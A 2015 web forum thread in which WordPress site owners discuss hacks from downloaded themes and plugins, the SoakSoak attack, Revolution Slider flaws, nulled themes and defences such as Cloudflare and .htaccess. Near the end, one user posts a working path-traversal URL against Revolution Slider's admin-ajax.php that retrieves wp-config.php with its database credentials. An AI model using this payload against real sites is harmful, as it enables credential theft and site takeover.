i download a theme and plugin and my cpanl is hacked

***intrepid*** · 02-05-2015, 06:57 AM

Wordfence alerts users about buggy plugins and themes.

***grumble*** · 02-05-2015, 05:34 PM

@Bale - It is NOT the core. I update daily and suffered from SoakSoak
@Intrapreneur - I say yes and another user has been hacked with the updated version despite what the devs say (Check the Sucuri forum)
@Angelina - See above
@Intrepid - Did not in this case

Sucuri and 9 other plugins failed to stop this.

The ONLY answer to prevent the next version of Soaksoak is:
Cloudflare (Use their geo blocking)
Custom .htaccess files.

NO PLUGIN WILL EVER STOP THESE ATTACKS!!!!!!

It's the architecture of Wordpress, MySQL and PHP that makes it possible.

***grumble*** · 02-05-2015, 05:49 PM

PS - This hit over 100,000 sites on december 14, and more since - one of the largest hacks. Through ONE plugin's bad coding. However the coder caused it, he was the one who 'fixed' it. Credibility of vendor = 0 in my books. The way they were speaking, it's an outsourced coder, not in-house.

Believe them at your own risk.

***grumble*** · 02-05-2015, 08:58 PM

SQL Injection attacks and how they work :

http://www.unixwiz.net/techtips/sql-injection.html

If it was cPanel - almost every site in the World would be hacked.

***tompk242*** · 02-05-2015, 09:20 PM

(02-04-2015 05:46 AM)utahman1971 Wrote:
(02-03-2015 10:33 PM)danimation3d Wrote: Woah far out, where'd you download this theme?
Personally, I stay away from the "nulled" crap. Group buys are probably the way to go. You'll spend $3-10 more than you would on a free nulled version. But you also avoid getting your butt hammered by some of the pricks out there who are waiting for you to play with their viruses
Sorry, but GB is not way to go, because you don't get a license with Themeforest. There is only one license, and that is the purchaser that gets it, and if that person shares his license, then the license gets deactivated. GB if they do it, should not share license, but that is bad for the group that pays, because they paid for a no license for the theme. How many people on the internet are honest? If you do GB for extended license of the theme, that is way more money for extended license, which makes the license able to be multiple shared.

$2900 for Newspaper theme for an example of extended license.

It's not correct

All of themes on Themeforest do not require activation, that's mean theme does not call back to developer so people on a group buy can use the theme without worry about malicious code inserted.

The licenset txt file usually is a text file for agreement etc...Group buy always is my choice

***ImGrateful*** · (This post was last modified: 02-05-2015 11:59 PM by ImGrateful.)

I'm saying in a general way that my opinion is revolution slider is already defamed by many all over web, it has many loopholes
which invite hackers

***ImGrateful*** · 02-06-2015, 12:31 AM

(02-05-2015 08:58 PM)grumble Wrote: SQL Injection attacks and how they work :

http://www.unixwiz.net/techtips/sql-injection.html

If it was cPanel - almost every site in the World would be hacked.

Thanks for sharing insights with our BBHF family.

This link might be useful for you n others http://blog.sucuri.net/2014/09/slider-re...oited.html

Also your blog post is a blessing for us
http://jam88.com/index.php/blog/

Is your site completely cleaned now?

***grumble*** · 02-06-2015, 07:56 AM

@Imgrateful All my sites were cleaned within 24 hours (I had 3, clients had 2) and I cleaned over 30 for another person.

The Sucuri blog was one of many places I researched when I was fixing it. I spent 2 weeks researching how it happened and how to prevent it and 4 weeks learning how to secure sites.

CloudFlare serves up 'local' copies of your site so the hacker only gets to the CDN (Content Delivery Network) and .htaccess works at server level to prevent read and write operations of any type you specify. Wordpress (and Joomla, Drupal etc.) are 'underneath' the server so cannot effectively control server operations.

You're welcome - Nice when people say thanks :-)

***Xecution*** · (This post was last modified: 02-06-2015 08:24 AM by Xecution.)

Holy crap, I am glad I found this thread.

Anyone using Revolution Slider, simply type in the following command and viola, you have downloaded the config file and now have passwords, etc.

Code:

http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

***grumble*** · 02-06-2015, 09:12 AM

@xecution - Does this work on the 'fixed' version of Revslider?

Prediction - New era of hacking has hit us. This won't be the first exploit using this technique and other plugins will have other weak points.